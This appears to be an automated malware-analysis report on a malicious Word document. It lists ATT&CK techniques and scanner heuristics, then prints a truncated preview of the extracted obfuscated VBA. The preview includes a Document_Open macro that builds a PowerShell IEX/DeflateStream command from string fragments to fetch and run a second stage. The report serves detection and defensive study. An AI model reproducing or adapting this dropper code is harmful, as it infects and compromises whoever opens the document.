MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open macro that calls the Shell() function. This function is used to execute a PowerShell command that downloads and executes content from a benign-looking URL, which is likely a second-stage payload. The ClamAV detection also confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6606419-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6606419-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20111 bytes |
SHA-256: 5e5b889ed5b91d16e5c07630530049d290532cef99cdece624e197fbb1baf24e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qaWkorNWaSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
htrPm = (wkkto / vYUpl / LDOkmB - EZQRir / (63946 * jtuPA - 47275 + AaftCM + (RjjHDa * twGpk / niTGCH + OfZal / (kCoFt * RRIjkX))))
tnwoZ = (qoSGZ / vLZlGG / mqHEr - rSQiw / (67119 * OBHaik - 2089 + awkhf + (DGrWd * BAQljF / iwaJTY + ctDwDW / (zMuXX * LnMYI))))
PvjBBw = (JNIhG / MmZNHG / VmdKf - OffbPI / (61455 * tXpzlS - 80187 + LBVnsu + (caOHzY * RZWMjo / msZarS + jPWnY / (abprwT * CABAiK))))
iuaRmGSzia ("" + OlWrdJSZzmQJ + KCtTHZCnVO + pjwTAqwMjz + oQsoXiNEBA + bVOWoA + bZiBCYIwM + YsKsTZiDqki)
vblrY = (jCIToz / WnBSt / usUJqJ - JbMPjw / (17415 * FanQX - 39393 + ZPZWu + (CvCXr * VYbSvi / jEqtns + mRNOBV / (ZSFkU * RGjKr))))
nuiIri = (lQiVmi / clhoW / pwFWh - UacXfC / (96316 * ArmFWT - 83006 + Ikjwq + (pVzWV * HrpIa / NEJsC + oiGkw / (RCdPnU * jkMlGY))))
End Sub
Attribute VB_Name = "inJCdiFFnQQh"
Function pjwTAqwMjz()
On Error Resume Next
Mfnkao = 16415 * MKTia - GrbwW * fdSrOA / (vlQwU / 84089 * FGSiZt + ZlcnU) * (IVErY + PQjMwV)
MTwLz = 82157 * AAYsZc - FrqDu * QZhYah / (OVtVNz / 57702 * FpQod + IVfwz) * (sKsWs + swnmXl)
ndZfHfi = "pow" + fGCfZwRABaPR + EBabWkEd + "ers" + nGfRTSiWPrd + TZLaKqvdJkq + "h" + zKvdcBiZsSTA + vsBQfpZGBLJt + "ell" + ziWoiiVUblP + CbGradHzkHUL + " " + qIjUiOGZ + fRwNbRQADIXfuT + " " + fcPWBdpXf + QhNadNKMIftYT + ".(" + HknKNQlSii + uCcaiQZzTqitS + " $v" + almDvfhV + UzbfPivSVQJf + "erb" + IurARCtr + KjvaOLMj + "o" + NSzTELnbwUwuj + BnhEBpdTTUijUE + "s" + cHNwpwX + PSuJKPz + "Epr" + NYfcWAkwiwW + XmQVnTfGE + "ef" + wmXiKJEiPpql + kMMqSYZ + "E" + vIsocjoYIItdkd + VunNcjAsUCHSP + "r" + LVpbaSUcCaQid + AiKCwimPUP + "EN" + UZZWIVR + vBbVBRkm + "C" + WNzCYINqLZFVMS + DdEINMw + "E.T"
hijvN = 3039 * IRkmWW - OvfFI * apJDB / (HiDkK / 32395 * zrZjuw + cMuif) * (jcpNiG + NirZcu)
uEhZVo = 47303 * oOkHl - NuaXX * fsqBEc / (TzAEA / 97129 * iHNIKp + SBzwz) * (pRzwF + SOBOf)
zizrUArH = "OSt" + FKoKjJHpFj + hZNrqDEaf + "ri" + BzdjPht + RVCHNpOquzMR + "n" + ptAJXcQRoEJmK + sILzfvLWFiB + "G" + jfokVHomO + FWzhwzaiIN + "()" + ARAvdWvfWnBlI + RDRpdlqtJw + "[1," + HEXjBdpoSU + QTszSUNY + "3]" + JarXYFKXrz + nbwGAITaGwrFZJ + Chr(43) + "'" + boiGojuwpiFji + MNRjQALUFEI + "X'" + jlzOMTwC + JEjCQVCjwMTis + "-j" + cqPUcCjRhME + XKwavVHckwvwC + "O" + FtFtplkd + opdmwpMoMMlN + "IN'" + WAArrUVZhULo + qFmhStHj + "'" + lJiJqHZsBWWpk + LLOIIbKiBzGZ + ")("
wiHFA = (rYVkpI - wHtihM + 79609 - GEdUP + 97980 + OJkMO * 36699 / IvTzhr) + (mmHEOo / NFkWc)
zbqVLF = (mMiZuT - koBVuw + 14114 - sYVOba + 63830 + kiWzC * 90955 / TYmCYz) + (iOIXzM / lfHnRj)
Zikkzo = (LzdtO - wwOii + 95586 - TRVPA + 19383 + AEApma * 72419 / RiOiDf) + (miLzUY / qBsia)
zaGUaVcGpB = "ne" + UkpJJHzn + iPhfTvuntirEA + "w-" + lOwwHzP + OisuVTnq + "obj" + lJhKiwkn + RQjzCXsArzp + "EcT" + YRoDzRarAApDz + QAWLmzr + " " + srwamzEVSUIstt + ClQPtwFSok + "sys" + ihrhTtKISzE + TkdwLWGmojLbiB + "Tem" + jmBIbrlcbYAj + DhQSaLc + "." + OkqpwfGlrNW + DsVczAUn + "IO." + JkfiLPbkJJ + YkCmwVnIVGSqd + "Co" + zLbBosNhFSBvVP + cCQTlZND + "mpr" + MBCRoAnSdZhHVu + wUvaSss + "e" + oNEMYwYCpfLin + HCmDiUj + "s" + idtHYhTJ + AniFFaJFjOz + "siO"
pvSPG = (PVHrui - FQdHLC + 41592 - dNZwj + 55090 + PAHKJ * 38254 / MGRNT) + (GsvobK / sbYCw)
XCmIvvIFKaU = "N.d" + itSaMtGH + UbCEXpwibFlR + "e" + VHdnbENHWr + znHAzkKDH + "fl" + nEjDNaraQ + EFQSjfXNELaJqL + "ATE" + FBHhNmnpisA + fROECiBkhEf + "s" + fINussmzlYJajS + jniXjYtMFoc + "Tre" + YzcCTGfbnzINh + FiSQkJzQAINGO + "aM" + EPMIMbjYPLmzv + KziBGaVLph + "( " + btGAQZwvsAY + YFDFzKBdd + "[" + bMuOjEXal + iILVZzs + "SY"
PPuXL = (nVSzH - tcSpu + 80975 - wkcMsi + 14537 + qpDKI * 20246 / MwztmQ) + (qZJbJ / pbZmzj)
azkiV = (GrXZD - vtYEij + 22690 - cwwVTa + 89269 + ckEkAo * 74218 / bMtRwj) + (LsHiP / RuOjpj)
sjHWR = "St" + DCsEEzfOmzwQ + qADjhtDCQV + "eM" + OQRLYiMZ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.